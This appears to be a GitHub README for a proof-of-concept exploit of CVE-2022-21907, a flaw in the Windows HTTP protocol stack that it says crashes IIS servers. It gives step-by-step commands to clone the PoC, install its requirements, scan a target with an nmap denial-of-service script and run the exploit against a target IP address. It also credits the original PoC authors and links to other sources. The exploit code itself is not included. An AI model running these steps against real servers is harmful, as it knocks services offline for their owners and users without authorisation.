CVE-2022-21907 - HTTP Protocol Stack Remote Code Execution Vulnerability
Original Exploit Authors
Very grateful to the original PoC author NU11SECURITY and michelep
Description:
HTTP Protocol Stack Remote Code Execution Vulnerability. This vulnerability would cause a denial-of-service attack to a target system that has an IIS web server.
Step Guides
-
Install git, then clone the PoC from the github repository:
sudo apt install git -y git clone https://github.com/asepsaepdin/CVE-2022-21907.git
-
Install the requirements using pip3 command:
sudo apt install python3-pip -y cd CVE-2022-21907 pip3 install -r requirements.txt
-
Check the presence of vulnerability of target machine using command:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
-
Then, run the PoC scripts using command:
python3 CVE-2022-21907.py -i 10.10.1.10
Notes: specify -i options with the target IP address
Credits
- https://nvd.nist.gov/vuln/detail/CVE-2022-21907#match-8257502
- https://www.exploit-db.com/exploits/51575
- https://github.com/mauricelambert/CVE-2022-21907
- https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC